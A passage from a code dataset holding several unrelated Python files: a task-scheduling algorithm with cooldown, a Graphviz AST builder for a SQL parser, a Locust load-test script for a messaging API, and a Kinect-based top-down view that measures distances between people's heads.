be done in original order.\nEach task could be done in one interval.\nFor each interval, CPU could finish one task or just be idle.\n\nHowever, there is a non-negative cooling interval K that means between two same tasks,\nthere must be at least K intervals that CPU are doing different tasks or just be idle.\n\nYou need to return the total amount of time CPU will take to finish all the given tasks.\n\nExample:\n\nInput: tasks = [\"1\",\"2\",\"1\",\"2\",\"2\",\"1\"], k = 2\nOutput: 9\nExplanation: 1-2-idle-1-2-idle-idle-2-1\n\nDo 1, can't do 1 for 2 turns\nDo 2, can't do 2 for 2 turns\nSaw 1, can't do it ...\n\nstore tasks & the last done time as we encounter\njust add k - (time_now-start_time) to time elasped\n\nSpace: T, being types of tasks\nTime: N, being the length of tasks\n-----\nAssuming sequence is the same item, 1, 1, ,1, 1, ...\nresult will be [1, ..K.., 1, ..K.., 1,..]\n\nTry to use less space, if k is low\nOnly need to store the last k items (the things we did the last k steps, plus their insert time)\nUse a deque & set (storing items in the deque)\n--\nIf item in deque, keep popping left & +1 to time\nTotal time is O(n) (store encounter time in the queue)\nTotal space is O(k)\n\"\"\"\n\n\ndef fast(tasks, cd):\n history = dict()\n time = 0\n for t in tasks:\n if t not in history or history[t] + cd < time:\n history[t] = time\n time += 1\n else:\n time += cd - (time - history[t]) + 1\n history[t] = time\n time += 1\n return time\n\n\nimport collections\n\n\"\"\"\n1,1 cd=1\n1,nothing,1\n1,2,1 cd=2\n\nt = 2, 1,2\n1 is inside\nt = 3\nt = 4\n\n1,2,nothing,1\n\"\"\"\n\n\ndef slow(tasks, cd):\n history = collections.deque()\n inside = set()\n time = 0\n for t in tasks:\n while len(history) > cd:\n item = history.popleft()\n if item:\n inside.remove(item)\n\n while t in inside:\n item = history.popleft()\n if item:\n inside.remove(item)\n history.append(None)\n time += 1\n\n history.append(t)\n inside.add(t)\n time += 1\n return time\n\n\ndef better_slow(tasks, cd):\n history = collections.deque()\n inside = set()\n\n curr = 1\n for t in tasks:\n while t in inside:\n val, time = history.popleft()\n inside.remove(val)\n curr = time + cd + 1\n history.append((t, curr))\n inside.add(t)\n curr = curr + 1\n\n while history and history[0][1] < curr - cd:\n val, time = history.popleft()\n inside.remove(val)\n\n while history:\n val, time = history.popleft()\n curr = time\n return curr\n\n\nif __name__ == \"__main__\":\n\n assert fast([1, 2, 1, 2, 2, 1], 2) == 9\n assert slow([1, 2, 1, 2, 2, 1], 2) == 9\n assert better_slow([1, 2, 1, 2, 2, 1], 2) == 9\n","sub_path":"lc_discuss/old/batch1/cpu_problem.py","file_name":"cpu_problem.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"110562418","text":"import ts as TS\nfrom expresiones import *\nfrom instrucciones import *\nfrom graphviz import Digraph\n\ndot = Digraph('AST', node_attr={'shape': 'note','color': 'lightblue2', 'style': 'filled'})\ncontadorNodos = 0\ninstrucciones_Global = []\n\nclass AST: \n\n def __init__(self):\n print('AST')\n\n\n def generarAST(self,instrucciones):\n global contadorNodos, dot, instrucciones_Global\n instrucciones_Global = instrucciones\n dot = Digraph('AST')\n contadorNodos = 2\n dot.node('node1','INIT')\n dot.node('node2','INSTRUCCIONES')\n dot.edge('node1','node2')\n indice = 0\n while indice < len(instrucciones_Global) :\n instruccion = instrucciones_Global[indice]\n if isinstance(instruccion, CreateDatabase):\n self.crearNodoCreateDatabase(\"node2\", instruccion)\n indice = indice +1\n dot.view('reportes/AST', cleanup=True)\n\n def crearNodoCreateDatabase(self, padre, instruccion):\n global contadorNodos, dot\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), 'CREATE DATABASE')\n dot.edge(padre, \"node\" + str(contadorNodos))\n temp1 = \"node\" + str(contadorNodos)\n self.crearNodoNombreDatabase(temp1,instruccion)\n self.crearNodoUsuarioDatabase(temp1,instruccion)\n self.crearNodoModoDatabase(temp1,instruccion)\n\n def crearNodoNombreDatabase(self,padre,instruccion):\n global contadorNodos, dot\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), 'NOMBRE DATABASE')\n dot.edge(padre, \"node\" + str(contadorNodos))\n temp1 = \"node\" + str(contadorNodos)\n self.crearNodoExpresion(temp1,instruccion.nombre)\n\n def crearNodoUsuarioDatabase(self,padre,instruccion):\n global contadorNodos, dot\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), 'USUARIO DATABASE')\n dot.edge(padre, \"node\" + str(contadorNodos))\n temp1 = \"node\" + str(contadorNodos)\n self.crearNodoExpresion(temp1,instruccion.usuario)\n\n def crearNodoModoDatabase(self,padre,instruccion):\n global contadorNodos, dot\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), 'MODO DATABASE')\n dot.edge(padre, \"node\" + str(contadorNodos))\n temp1 = \"node\" + str(contadorNodos)\n self.crearNodoExpresion(temp1,instruccion.modo)\n\n def crearNodoExpresion(self, padre, expresion):\n global contadorNodos, dot\n if isinstance(expresion, ExpresionIdentificador):\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), str(expresion.id))\n dot.edge(padre, \"node\" + str(contadorNodos))\n elif isinstance(expresion, ExpresionNumero):\n contadorNodos = contadorNodos + 1\n dot.node(\"node\" + str(contadorNodos), str(expresion.val))\n dot.edge(padre, \"node\" + str(contadorNodos))\n","sub_path":"parser/team15/TytusDB_G15/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"278441821","text":"from locust import HttpLocust, TaskSet, task\nimport random\nimport uuid\nimport json\n\nMIN_WAIT_TIME = 5000\nMAX_WAIT_TIME = 15000\nPATH = '/api/v1.0{0}'\nAPI_KEY = 'api-key'\nMETHODS = ['delete', 'get', 'post', 'put']\n\n\nclass UserAction(TaskSet):\n\n def on_start(self):\n self.sender = \"message-sender\"\n self.payloads = [\n # good payload\n # httpbin\n {\n \"messageId\": str(uuid.uuid4()),\n \"senderId\": self.sender,\n \"recipients\": [\n \"0700000000\", \"0700000001\", \"0700000002\", \"0700000003\"\n ],\n \"messageType\": \"dummy\",\n \"channel\": \"httpbin\",\n \"message\": \"This is an example message\",\n \"priority\": \"normal\",\n \"callback\": \"https://mydomain.com/callback/y7sdxl24df\"\n },\n # africas-talking\n {\n \"messageId\": str(uuid.uuid4()),\n \"senderId\": \"0722000000\",\n \"recipients\": [\n \"0700000000\", \"0700000001\", \"0700000002\", \"0700000003\"\n ],\n \"messageType\": \"sms\",\n \"channel\": \"africas-talking\",\n \"message\": \"This is an example message\",\n \"priority\": \"normal\",\n \"callback\": \"https://mydomain.com/callback/y7sdxl24df\"\n },\n # firebase\n {\n \"messageId\": str(uuid.uuid4()),\n \"senderId\": self.sender,\n \"recipients\": [\n \"0700000000\", \"0700000001\", \"0700000002\", \"0700000003\"\n ],\n \"messageType\": \"push\",\n \"channel\": \"firebase\",\n \"message\": \"This is an example message\",\n \"priority\": \"normal\",\n \"callback\": \"https://mydomain.com/callback/y7sdxl24df\"\n },\n # smpp\n {\n \"messageId\": str(uuid.uuid4()),\n \"senderId\": self.sender,\n \"recipients\": [\n \"0700000000\", \"0700000001\", \"0700000002\", \"0700000003\"\n ],\n \"messageType\": \"sms\",\n \"channel\": \"smpp\",\n \"message\": \"This is an example message\",\n \"priority\": \"normal\",\n \"callback\": \"https://mydomain.com/callback/y7sdxl24df\"\n },\n # bad payload\n {\n \"messageId\": str(uuid.uuid4())\n },\n ]\n\n self.headers = [\n # correct auth headers\n {\n 'Content-type': 'application/json',\n 'Authorization': API_KEY\n },\n # wrong api-key\n {\n 'Content-type': 'application/json',\n 'Authorization': 'wrong'\n }\n ]\n\n @task(2)\n def send_message(self):\n for method in METHODS:\n payload = self.payloads[random.randint(0, 3)]\n payload[\"messageId\"] = str(uuid.uuid4())\n getattr(self.client, method)(\n PATH.format('/sendMessage'),\n data=json.dumps(payload),\n headers=self.headers[random.randint(0, 1)]\n )\n\n # make a good request\n payload = self.payloads[random.randint(0, 3)]\n payload[\"messageId\"] = str(uuid.uuid4())\n self.client.post(\n PATH.format('/sendMessage'),\n data=json.dumps(payload),\n headers=self.headers[0]\n )\n\n @task(1)\n def check_health(self):\n for method in METHODS:\n getattr(self.client, method)(\n PATH.format('/checkHealth'),\n data=json.dumps(self.payloads[random.randint(0, 3)]),\n headers=self.headers[random.randint(0, 1)]\n )\n # make a good request\n self.client.get(\n PATH.format('/checkHealth'),\n headers=self.headers[0]\n )\n\n\nclass User(HttpLocust):\n task_set = UserAction\n min_wait = MIN_WAIT_TIME\n max_wait = MAX_WAIT_TIME\n","sub_path":"utils/locust/task_set.py","file_name":"task_set.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"632304913","text":"from pykinect2 import PyKinectV2\nfrom pykinect2.PyKinectV2 import *\nfrom pykinect2 import PyKinectRuntime\nimport numpy as np\n\nimport ctypes\nimport _ctypes\nimport pygame\nimport sys\nimport math\nimport time\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport traceback\nimport os\nimport copy\n\nimport pygame, sys\nfrom pygame.locals import *\n\nif sys.hexversion >= 0x03000000:\n import _thread as thread\nelse:\n import thread\n\n# colors for drawing different bodies \nSKELETON_COLORS = [pygame.color.THECOLORS[\"red\"], \n pygame.color.THECOLORS[\"blue\"], \n pygame.color.THECOLORS[\"green\"], \n pygame.color.THECOLORS[\"orange\"], \n pygame.color.THECOLORS[\"purple\"], \n pygame.color.THECOLORS[\"yellow\"], \n pygame.color.THECOLORS[\"violet\"]]\n\nwhite = (255,255,255)\nblack = (0,0,0)\ngray = (200,200,200)\nred = (255,0,0)\n\n\nclass TopDownViewRuntime(object):\n def __init__(self):\n #schaal van topdown en color camera\n self.topdown_scale = 1/10\n self.color_scale = 1/4\n\n #grootte van topdown surface (width, height)\n self.topdown_surface_size = (1000, 600)\n\n self.display_pygame = False\n\n\n self._done = False\n self._kinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color | PyKinectV2.FrameSourceTypes_Body | PyKinectV2.FrameSourceTypes_Depth)\n self._bodies = None\n self.frame = 0\n self.topdown_position = (20,20)\n self.new_depth_frame = False\n self.new_body_frame = False\n\n \n\n def draw_color_frame(self, frame, target_surface):\n target_surface.lock()\n address = self._kinect.surface_as_array(target_surface.get_buffer())\n ctypes.memmove(address, frame.ctypes.data, frame.size)\n del address\n target_surface.unlock()\n\n def draw_depth_frame(self, frame, target_surface):\n if frame is None: # some usb hub do not provide the infrared image. it works with Kinect studio though\n return\n target_surface.lock()\n f8=np.uint8(frame.clip(1,4000)/16.)\n frame8bit=np.dstack((f8,f8,f8))\n address = self._kinect.surface_as_array(target_surface.get_buffer())\n ctypes.memmove(address, frame8bit.ctypes.data, frame8bit.size)\n del address\n\n def draw_infrared_frame(self, frame, target_surface):\n if frame is None: # some usb hub do not provide the infrared image. it works with Kinect studio though\n return\n target_surface.lock()\n f8=np.uint8(frame.clip(1,4000)/16.)\n frame8bit=np.dstack((f8,f8,f8))\n address = self._kinect.surface_as_array(target_surface.get_buffer())\n ctypes.memmove(address, frame8bit.ctypes.data, frame8bit.size)\n del address\n target_surface.unlock()\n\n def get_window_size(self):\n return (float(self._kinect.color_frame_desc.Width), float(self._kinect.color_frame_desc.Height))\n\n #convert x,y in frame to x, y irl\n def convert_to_coordinates(self, locations, window_size = None):\n if len(locations) == 0:\n return\n lis = True\n to_return = []\n if type(locations[0]) != list and type(locations[0]) != tuple:\n locations = [locations]\n lis = False\n for location in locations:\n if window_size is None:\n window_size = self.get_window_size()\n horizontal_factor = 1/1000\n vertical_factor = -1/1000\n x, y, depth, _ = location\n width, height = window_size\n horizontal_coordinate = (x-width/2)*depth*horizontal_factor\n vertical_coordinate = (y-height/2)*depth*vertical_factor\n to_return.append([horizontal_coordinate, vertical_coordinate, depth])\n if not lis:\n return to_return[0]\n else:\n return to_return\n\n def convert_to_coordinate(self, location, window_size = None):\n if window_size is None:\n window_size = self.get_window_size()\n horizontal_factor = 1/1000\n vertical_factor = -1/1000\n x, y, depth = location\n width, height = window_size\n horizontal_coordinate = (x-width/2)*depth*horizontal_factor\n vertical_coordinate = (y-height/2)*depth*vertical_factor\n return [horizontal_coordinate, vertical_coordinate, depth]\n\n\n def get_distance(self, location1, location2):\n # print(\"1:\", location1, location1[0:3], \"\\n\",\"2:\", location2 , location2[0:3], \"\\n\")\n x1, y1, z1 = location1[0:3]\n x2, y2, z2 = location2[0:3]\n # print(location1, location2)\n argument = (x1-x2)**2+(y1-y2)**2+(int(z1)-int(z2))**2\n \n if argument < 0:\n # print(location1, location2, (x1-x2)**2,(y1-y2)**2,z1, z2,int(z1)-int(z2), (int(z1)-int(z2))**2, argument)\n # print(\"argument negative\")\n return 0\n return(math.sqrt(argument))\n\n def get_distances(self, location, list_location, return_zero = False):\n to_return = []\n for second_location in list_location:\n d = self.get_distance(location, second_location)\n if d != 0 or return_zero:\n to_return.append(d)\n return to_return\n\n\n def get_key_nearest(self, location, dict):\n if len(dict) > 0 or dict == {}:\n return None\n print(dict, len(dict), dict == {})\n nearest_value = list(dict.values())[0]\n nearest_key = list(dict.keys())[0]\n for key in list(dict.keys()):\n value = dict[key]\n if get_distance(location, dict[key]) < get_distance(location, nearest_value):\n nearest_key = key\n nearest_value = dict[key]\n return nearest_key\n\n def d3_to_d2(self, location):\n return [location[0], location[2]]\n\n def coordinate_to_pixel(self, location, extra = 0):\n return (int(location[0]*self.topdown_scale + self.topdown_surface_size[0]/2 + extra), int(location[2]*self.topdown_scale + extra))\n\n def get_middle(self, location1, location2):\n x1, y1, z1 = location1\n x2, y2, z2 = location2\n return ((x1+x2)/2,(y1+y2)/2,(z1+z2)/2)\n\n def draw_background(self, surface):\n surface.fill(black)\n width, height = surface.get_size()\n pygame.draw.rect(surface, black, ((0,0), (width, height)), 3)\n grid_width = int(width/100)\n grid_height = int(height/100)\n margin = 5\n grid_rectangle_size = 100-margin\n for row in range(grid_height):\n for column in range(grid_width):\n pygame.draw.rect(surface,\n white,\n [(margin + grid_rectangle_size) * column + margin/2,\n (margin + grid_rectangle_size) * row + margin/2,\n grid_rectangle_size,\n grid_rectangle_size])\n pygame.draw.line(surface, black, self.coordinate_to_pixel((0,0,0)), self.coordinate_to_pixel((21000, 0, 27000)), 10) \n pygame.draw.line(surface, black, self.coordinate_to_pixel((0,0,0)), self.coordinate_to_pixel((-21000, 0, 27000)), 10) \n\n def get_head_location(self):\n if self._bodies is not None: \n self.head_locations = []\n for i in range(0, self._kinect.max_body_count):\n body = self._bodies.bodies[i]\n if not body.is_tracked: \n continue \n joints = body.joints \n joint_points = self._kinect.body_joints_to_color_space(joints)\n joint_points_depth = self._kinect.body_joints_to_depth_space(joints)\n\n if self.new_body_frame and self.new_depth_frame:\n try:\n head_joint = joint_points[PyKinectV2.JointType_Head]\n head_joint_depth = joint_points_depth[PyKinectV2.JointType_Head]\n depth_value = self.depth_frame[int(head_joint_depth.y), int(head_joint_depth.x)]\n if depth_value != 0:\n self.head_locations.append([head_joint.x, head_joint.y, depth_value])\n # print(\"depth coordinate: \",int(head_joint_depth.y), int(head_joint_depth.x), \"/color coordinate:\", int(head_joint.x), int(head_joint.y))\n except Exception as e:\n if \"infinity\" not in str(e):\n print(\"error before return:\", e)\n\n def draw_heads(self):\n combos = []\n # print(self.head_locations)\n head_coordinates = self.convert_to_coordinates(self.head_locations)\n text_surfaces_to_draw = []\n too_close = 0\n for head in self.head_locations:\n coordinate = self.convert_to_coordinates(head)\n # print(head_coordinates, self.get_distances(coordinate, head_coordinates))\n try:\n nearest = min(self.get_distances(coordinate, head_coordinates))\n except Exception as e:\n nearest = 3000\n # print(e, head_coordinates, self.get_distances(coordinate, head_coordinates))\n if nearest > 1500:\n # print(nearest)\n circle_color = (100, 200, 100)\n else:\n circle_color = (255, 0, 0)\n too_close += 1\n radius = int(750*self.topdown_scale)\n\n for second_head in self.head_locations:\n if second_head != head:\n \n if ([head, second_head] not in combos) and ([second_head, head] not in combos):\n second_coordinate = self.convert_to_coordinates(second_head)\n distance = self.get_distance(coordinate, second_coordinate)\n \n \n pygame.draw.line(self.topdown_surface, (255, 0, 0), self.coordinate_to_pixel(coordinate), self.coordinate_to_pixel(second_coordinate), 5)\n if distance > 0:\n textsurface = self.myfont.render(str(round(distance/1000, 1)).replace(\".\",\",\")+\" m\", False, (0, 0, 255))\n text_coordinate = self.coordinate_to_pixel(self.get_middle(coordinate, second_coordinate))\n \n text_surfaces_to_draw.append([textsurface, text_coordinate])\n combos.append([head, second_head])\n # if distance < 1500:\n # circle_color = (255,0,0)\n\n pygame.draw.circle(self.topdown_surface, circle_color, self.coordinate_to_pixel(coordinate), radius, 3)\n pygame.draw.circle(self.topdown_surface, circle_color, self.coordinate_to_pixel(coordinate), 20)\n\n textsurface = self.myfont.render(str(head[3]), False, (0, 0, 255))\n text_coordinate = self.coordinate_to_pixel(coordinate) \n text_surfaces_to_draw.append([textsurface, text_coordinate])\n\n for textsurface, text_coordinate in text_surfaces_to_draw:\n pygame.draw.rect(self.topdown_surface, gray, ((text_coordinate[0]-5, text_coordinate[1]-5), (textsurface.get_size()[0]+10, textsurface.get_size()[1]+10)))\n pygame.draw.rect(self.topdown_surface, black, ((text_coordinate[0]-5, text_coordinate[1]-5), (textsurface.get_size()[0]+10, textsurface.get_size()[1]+10)), 3)\n self.topdown_surface.blit(textsurface, text_coordinate)\n\n def get_position_from_frame(self, frame_coordinate):\n frame_x, frame_y = frame_coordinate\n depth = self._kinect._mapper.MapCameraPointToDepthSpace(frame_coordinate) \n print(frame_x, frame_y, depth)\n\n\n def d3d_map(self):\n # http://archive.petercollingridge.co.uk/book/export/html/460\n self.show_color_pixel = False\n\n pygame.init()\n factor = 2\n zoom_factor = 2\n self.screen = pygame.display.set_mode((192*factor*2,108*factor*2+192*factor), pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)\n self.color_surface = pygame.Surface((1920, 1080), 0, 32)\n self.depth_surface = pygame.Surface((self._kinect.depth_frame_desc.Width, self._kinect.depth_frame_desc.Height), 0, 24)\n self.node_surface = pygame.Surface((1000*zoom_factor, 1000*zoom_factor), 0, 32)\n frame = 0\n got_frame = False\n begin_time = time.time()\n\n self.debug_time = {\"mapping\": 0, \"transforming\": 0, \"displaying\": 0, \"new_mapping\": 0}\n self.status = {\"offset\": [630*zoom_factor,-440*zoom_factor], \"scaling_factor\": 1, \"rotate\": [0,0,0]}\n\n step = 2\n width, height = 512, 424\n n_width, n_height = int(width / step), int(height / step)\n c_width, c_height = n_width * step, n_height * step\n x_coordinates = np.repeat(np.arange(0, c_width, step), n_height).reshape(n_height, n_width, order='F').ravel()\n y_coordinates = np.repeat(np.arange(0, c_width, step), n_height)\n\n while True:\n if got_frame:\n frame += 1\n if frame == 1:\n begin_time = time.time()\n if self._kinect.has_new_color_frame(): \n color_frame = self._kinect.get_last_color_frame()\n self.draw_color_frame(color_frame, self.color_surface)\n got_frame = True\n passed_time = time.time()-begin_time\n print(\"frame\", frame, round(passed_time, 2), round(frame/passed_time, 2))\n if self._kinect.has_new_depth_frame():\n depth_frame_og = self._kinect.get_last_depth_frame()\n depth_frame = depth_frame_og.reshape(424,512)\n self.draw_infrared_frame(depth_frame, self.depth_surface)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT: self.status[\"offset\"][0] += 50*zoom_factor\n if event.key == pygame.K_RIGHT: self.status[\"offset\"][0] -= 50*zoom_factor\n if event.key == pygame.K_DOWN: self.status[\"offset\"][1] += 50*zoom_factor\n if event.key == pygame.K_UP: self.status[\"offset\"][1] -= 50*zoom_factor\n if event.key == pygame.K_EQUALS: self.status[\"scaling_factor\"] += 0.5\n if event.key == pygame.K_MINUS: self.status[\"scaling_factor\"] -= 0.5\n if event.key == pygame.K_q: self.status[\"rotate\"][0] += math.pi/8 #a\n if event.key == pygame.K_a: self.status[\"rotate\"][0] -= math.pi/8 #q\n if event.key == pygame.K_w: self.status[\"rotate\"][1] += math.pi/8 #z\n if event.key == pygame.K_s: self.status[\"rotate\"][1] -= math.pi/8\n if event.key == pygame.K_e: self.status[\"rotate\"][2] += math.pi/8\n if event.key == pygame.K_d: self.status[\"rotate\"][2] -= math.pi/8\n print(event.key, self.status)\n \n if frame >= 1:\n color_list = []\n\n map_time = time.time()\n\n z = depth_frame[0:c_height:step, 0:c_width:step].flatten()\n x_transformed = (x_coordinates - width / 2) * z / 1000\n y_transformed = -(y_coordinates - height / 2) * z / 1000\n xyz = np.c_[x_transformed, y_transformed, z / 4]\n\n self.debug_time[\"new_mapping\"] += time.time() - map_time\n\n\n\n self.nodes = np.array(xyz)\n self.nodes = np.hstack((self.nodes, np.ones((len(self.nodes), 1))))\n\n transformation_matrices = []\n transform_time = time.time()\n\n # rotateXMatrix\n c = np.cos(self.status[\"rotate\"][0])\n s = np.sin(self.status[\"rotate\"][0])\n transformation_matrices.append(np.array([[1, 0, 0, 0],\n [0, c,-s, 0],\n [0, s, c, 0],\n [0, 0, 0, 1]]))\n\n # rotateYMatrix\n c = np.cos(self.status[\"rotate\"][1])\n s = np.sin(self.status[\"rotate\"][1])\n transformation_matrices.append(np.array([[ c, 0, s, 0],\n [ 0, 1, 0, 0],\n [-s, 0, c, 0],\n [ 0, 0, 0, 1]]))\n\n # rotateZMatrix\n c = np.cos(self.status[\"rotate\"][2])\n s = np.sin(self.status[\"rotate\"][2])\n transformation_matrices.append(np.array([[c,-s, 0, 0],\n [s, c, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]]))\n\n # scaling\n s = (self.status[\"scaling_factor\"], )*3\n transformation_matrices.append(np.array([[s[0], 0, 0, 0],\n [0, s[1], 0, 0],\n [0, 0, s[2], 0],\n [0, 0, 0, 1]]))\n\n # translation\n transformation_matrices.append(np.array([[1, 0, 0,0],\n [0, 1, 0,0],\n [0, 0, 1,0],\n [self.status[\"offset\"][0], self.status[\"offset\"][1], 0,1]]))\n\n for transform in transformation_matrices:\n self.nodes = np.dot(self.nodes, transform)\n\n self.debug_time[\"transforming\"] += time.time() - transform_time\n\n\n display_time = time.time()\n\n self.node_surface.fill(black)\n color_to_draw = (white)\n\n for index, node in enumerate(self.nodes):\n if self.show_color_pixel: color_to_draw = color_list[index]\n pygame.draw.circle(self.node_surface, color_to_draw, (int(node[0]), -int(node[1])), 2, 0)\n\n self.debug_time[\"displaying\"] += time.time()-display_time\n\n \n self.color_surface_to_draw = pygame.transform.scale(self.color_surface, (192*factor,108*factor));\n self.depth_surface_to_draw = pygame.transform.scale(self.depth_surface, (192*factor,108*factor));\n self.node_surface_to_draw = pygame.transform.scale(self.node_surface, (192*factor*2,192*factor*2));\n self.screen.blit(self.color_surface_to_draw, (0,0))\n self.screen.blit(self.depth_surface_to_draw, (192*factor,0))\n self.screen.blit(self.node_surface_to_draw, (0,108*factor))\n\n pygame.display.update()\n pygame.display.flip()\n\n if frame > 200:\n print(dict([(key, self.debug_time[key] / (time.time()-begin_time)) for key in self.debug_time.keys()]))\n break\n\n\n\n \n\n def color_and_depth_interface(self):\n pygame.init()\n factor = 4\n self.screen = pygame.display.set_mode((192*factor*2,108*factor), pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)\n self.color_surface = pygame.Surface((1920, 1080), 0, 32)\n # self.depth_surface = pygame.Surface((424, 512), 0, 32)\n self.depth_surface = pygame.Surface((self._kinect.depth_frame_desc.Width, self._kinect.depth_frame_desc.Height), 0, 24)\n print(\"depth size\", (self._kinect.depth_frame_desc.Width, self._kinect.depth_frame_desc.Height), \"color size\", (self._kinect.color_frame_desc.Width, self._kinect.color_frame_desc.Height))\n while True:\n if self._kinect.has_new_color_frame():\n color_frame = self._kinect.get_last_color_frame()\n self.draw_color_frame(color_frame, self.color_surface)\n\n if self._kinect.has_new_depth_frame():\n depth_frame = self._kinect.get_last_depth_frame()\n self.draw_infrared_frame(depth_frame, self.depth_surface)\n\n self.color_surface_to_draw = pygame.transform.scale(self.color_surface, (192*factor,108*factor));\n self.depth_surface_to_draw = pygame.transform.scale(self.depth_surface, (192*factor,108*factor));\n self.screen.blit(self.color_surface_to_draw, (0,0))\n self.screen.blit(self.depth_surface_to_draw, (192*factor,0))\n\n pygame.display.update()\n pygame.display.flip()\n\n\n def draw_foreground(self):\n self._screen.blit(self.topdown_surface, self.topdown_position)\n\n h_to_w = float(self.color_surface.get_height()) / self.color_surface.get_width()\n target_height = int((h_to_w * self._screen.get_width())*self.color_scale)\n surface_to_draw = pygame.transform.scale(self.color_surface, (int(self._screen.get_width()*self.color_scale), target_height));\n color_position = (self.topdown_position[0] + self.topdown_surface.get_size()[0] + 20, self.topdown_position[1])\n self._screen.blit(surface_to_draw, color_position)\n info_position = (color_position[0], color_position[1]+surface_to_draw.get_size()[1]+20)\n self.info_surface = pygame.transform.scale(self.info_surface, (surface_to_draw.get_size()[0], self.topdown_surface.get_size()[1]-surface_to_draw.get_size()[1]-20))\n self.info_surface.fill(white)\n pygame.draw.rect(self.info_surface, black, ((0,0), self.info_surface.get_size()), 5)\n self._screen.blit(self.info_surface, info_position)\n\n pygame.display.update()\n pygame.display.flip()\n\n\n def retrieve_data(self, draw = True):\n if (self.sensor and self._kinect.has_new_color_frame()) or (not self.sensor and self.frame_name in self.color_files):\n if self.sensor:\n self.color_frame = self._kinect.get_last_color_frame()\n else:\n self.color_frame = np.load(self.folder_path+\"color/\"+self.frame_name)\n\n\n self.draw_color_frame(self.color_frame, self.color_surface)\n pygame.draw.rect(self.color_surface, black, ((0,0), self.color_surface.get_size()), 80)\n\n if self.record: np.save(self.folder_path+\"/color/frame_\"+str(self.frame), self.color_frame)\n \n if (self.sensor and self._kinect.has_new_body_frame()): \n self._bodies = self._kinect.get_last_body_frame()\n self.new_body_frame = True\n\n if (self.sensor and self._kinect.has_new_depth_frame()) or (not self.sensor and self.frame_name in self.depth_files):\n if self.sensor:\n self.depth_frame = self._kinect.get_last_depth_frame()\n else:\n self.depth_frame = np.load(self.folder_path+\"depth/\"+self.frame_name)\n\n if self.record: np.save(self.folder_path+\"/depth/frame_\"+str(self.frame), self.depth_frame)\n self.depth_frame = self.depth_frame.reshape(424,512)\n self.new_depth_frame = True\n\n if self.frame >= 1:\n last_head_locations = copy.copy(self.head_locations)\n # self.head_locations = []\n\n if self.sensor: \n head_location_to_add = self.get_head_location() \n if head_location_to_add is not None: self.head_locations = head_location_to_add\n elif self.frame_name in self.heads_files: \n self.head_locations = [list(element) for element in np.load(self.folder_path+\"heads/\"+self.frame_name)]\n\n if self.record: np.save(self.folder_path+\"/heads/frame_\"+str(self.frame), np.array(self.head_locations))\n\n\n for index, head in enumerate(self.head_locations):\n # print(index, head)\n \n if len(head) == 3:\n # print(head, self.head_locations)\n if self.frame >= 1:\n d = self.get_distances(head, last_head_locations, return_zero = True)\n \n if True:#len(d) > 0:\n \n if len(d) > 0 and min(d) < 150:\n last_coordinate = last_head_locations[d.index(min(d))]\n id_to_add = last_coordinate[3]\n # print(\"self:\", head, \"/head_locations:\", self.head_locations, \"/distances\", d, \"/index:\", d.index(min(d)), \"/id:\", id_to_add)\n else:\n if len(d)>0:\n print(min(d))\n self.head_id_count += 1\n id_to_add = self.head_id_count\n head.append(id_to_add)\n print(\"head_location frame\",self.frame, self.head_locations)\n \n\n def user_interface(self):\n pygame.init()\n self._clock = pygame.time.Clock()\n self._infoObject = pygame.display.Info()\n self._screen = pygame.display.set_mode((1430,650), pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)\n self.topdown_surface = pygame.Surface(self.topdown_surface_size, 0, 32)\n self.color_surface = pygame.Surface((1920, 1080), 0, 32)\n self.info_surface = pygame.Surface((400,800), 0,32)\n pygame.display.set_caption('Topdown view')\n pygame.font.init()\n self.myfont = pygame.font.SysFont('Comic Sans MS', 30)\n self.draw_background(self.topdown_surface)\n self._screen.fill(white)\n self.head_id_count = 0\n self.head_locations = []\n self.begin_time = time.time()\n self.fps = 90\n\n self.sensor = True\n self.record = False\n\n if not self.sensor:\n self.folder_name = \"kinect_recording_1606224934\"\n self.folder_path = \"C:/Users/david/Documenten/peno/P_en_O_3_computer_vision/kinect_data/\"+self.folder_name+\"/\"\n self.color_files = [f for f in os.listdir(self.folder_path+\"color\")]\n self.depth_files = [f for f in os.listdir(self.folder_path+\"depth\")]\n self.heads_files = [f for f in os.listdir(self.folder_path+\"heads\")]\n self.last_frame = max([int(element.split(\"_\")[1].split(\".\")[0]) for element in self.heads_files])\n\n if self.record:\n self.folder_name = str(int(time.time()))\n self.folder_path = \"C:/Users/david/Documenten/peno/P_en_O_3_computer_vision/kinect_data/kinect_recording_\"+self.folder_name\n os.mkdir(self.folder_path)\n os.mkdir(self.folder_path+\"/color\")\n os.mkdir(self.folder_path+\"/depth\")\n os.mkdir(self.folder_path+\"/heads\")\n print(\"made directory\", self.folder_path)\n\n while True:\n\n if not self.sensor: self.frame_name = \"frame_\"+str(self.frame)+\".npy\"\n\n self.retrieve_data()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.VIDEORESIZE:\n self._screen = pygame.display.set_mode(event.dict['size'],pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)\n self._screen.fill(white)\n\n if self.head_locations is not None and len(self.head_locations)>0: \n self.draw_background(self.topdown_surface)\n\n self.draw_heads()\n\n self.draw_foreground()\n\n \n self.frame = 